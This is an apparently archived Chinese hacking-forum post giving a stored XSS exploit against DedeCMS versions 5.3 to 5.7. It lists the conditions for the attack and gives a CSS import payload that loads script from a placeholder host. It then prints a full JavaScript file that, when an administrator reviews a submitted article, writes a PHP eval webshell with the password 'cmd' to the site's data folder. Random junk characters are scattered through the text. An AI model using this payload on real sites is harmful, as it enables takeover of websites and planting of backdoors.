中国网络渗透测试联盟

标题: dedecms xss oday通杀所有版本 可getshell [打印本页]

作者: admin    时间: 2012-9-15 13:56
标题: dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
. h5 B/ D, c4 J- Y- @& P2 [4 O, f6 W为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰): O( q. o$ ~, |: R
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
5 q/ S5 b' T0 B/ P下面说说利用方法。1 x( y7 W% t! S  \! K) g
条件有2个:/ M/ X. `5 a% @8 K9 M
1.开启注册9 M7 c+ p. I8 P1 A& M6 I
2.开启投稿
# e+ |; i# X6 t+ d注册会员----发表文章: M8 v- ]8 |& W& k& o
内容填写:5 q( M0 z/ \- k4 r3 b
复制代码
* A8 R) G( O- p* D! B<style>@im\port'\http://xxx.com/xss.css';</style># f7 H7 H" m" u+ H4 ]0 e: V
新建XSS.Css
! }: ?1 y! [- p' ^0 D复制代码
8 T# J; Y5 W* s* P& @  f, R.body{. ?4 b2 q, }( D! V7 `
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
8 a4 j: o& x; O0 [' ?新建xss.js 内容为! b* v. Z3 W9 I/ V" l. f4 H
复制代码. a1 S1 t9 a* Y: n! O0 H* J* [
1.var request = false;& |# U# Q+ G1 v: \+ R% k1 x5 V9 B
2.if(window.XMLHttpRequest) {
6 Q9 o* g6 |1 M5 a0 m, x& K. m' C3.request = new XMLHttpRequest();/ ^2 b5 i" d" O6 E! O# d
4.if(request.overrideMimeType) {
* j3 `4 R: X# N4 k9 k5.request.overrideMimeType('text/xml');8 i5 G' L; g" Y! r1 a* Z
6.}4 m5 t6 w5 j+ h* F* L6 y
7.} else if(window.ActiveXObject) {
5 G( {6 f5 Q; N2 c8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
$ x" W  c1 _6 h# \" M9.for(var i=0; i<versions.length; i++) {
0 L* C+ N; P" E" ^4 A) e% q10.try {
$ y/ Z/ S( H2 G6 g11.request = new ActiveXObject(versions);3 |& Q  i! B, ^& `
12.} catch(e) {}
# o& Q0 x& T8 H7 b) z13.}
1 S' k% Z) Y+ i/ q14.}
2 u3 v* t, w- A3 H15.xmlhttp=request;
. l% w3 x' k: W& W5 P; x8 o' O9 G16.function getFolder( url ){- u: R4 Z6 w- ^* D. ~8 @( X0 G+ Q
17. obj = url.split('/')  s, n% U) [0 `6 t% E, }
18. return obj[obj.length-2]! `" v  a1 X; @- @- ^. B
19.}  v& R/ `6 ]+ z
20.oUrl = top.location.href;# |' `+ L+ L: E# C, A
21.u = getFolder(oUrl);6 D- b( [+ i# _( A3 L
22.add_admin();6 a; D3 l+ I7 q- h% ?/ o! |
23.function add_admin(){# F' t4 T9 K( j6 e
24.var url= "/"+u+"/sys_sql_query.php";
! T' B+ R$ h( b5 W! [8 V6 s/ d' o  _+ X25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
! Q/ o9 s3 ?8 w4 j! O# }  d26.xmlhttp.open("POST", url, true);
  @) ?9 _& d6 ~% I# I+ }27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");9 S9 x) `  h- C7 G% D
28.xmlhttp.setRequestHeader("Content-length", params.length);
0 t9 n: S/ U4 d, b# S29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
5 V2 |$ [3 Z2 `# d) f0 {30.xmlhttp.send(params);
& J$ _' h: J1 K, @* z0 f31.}
1 j% s! K' h2 A当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2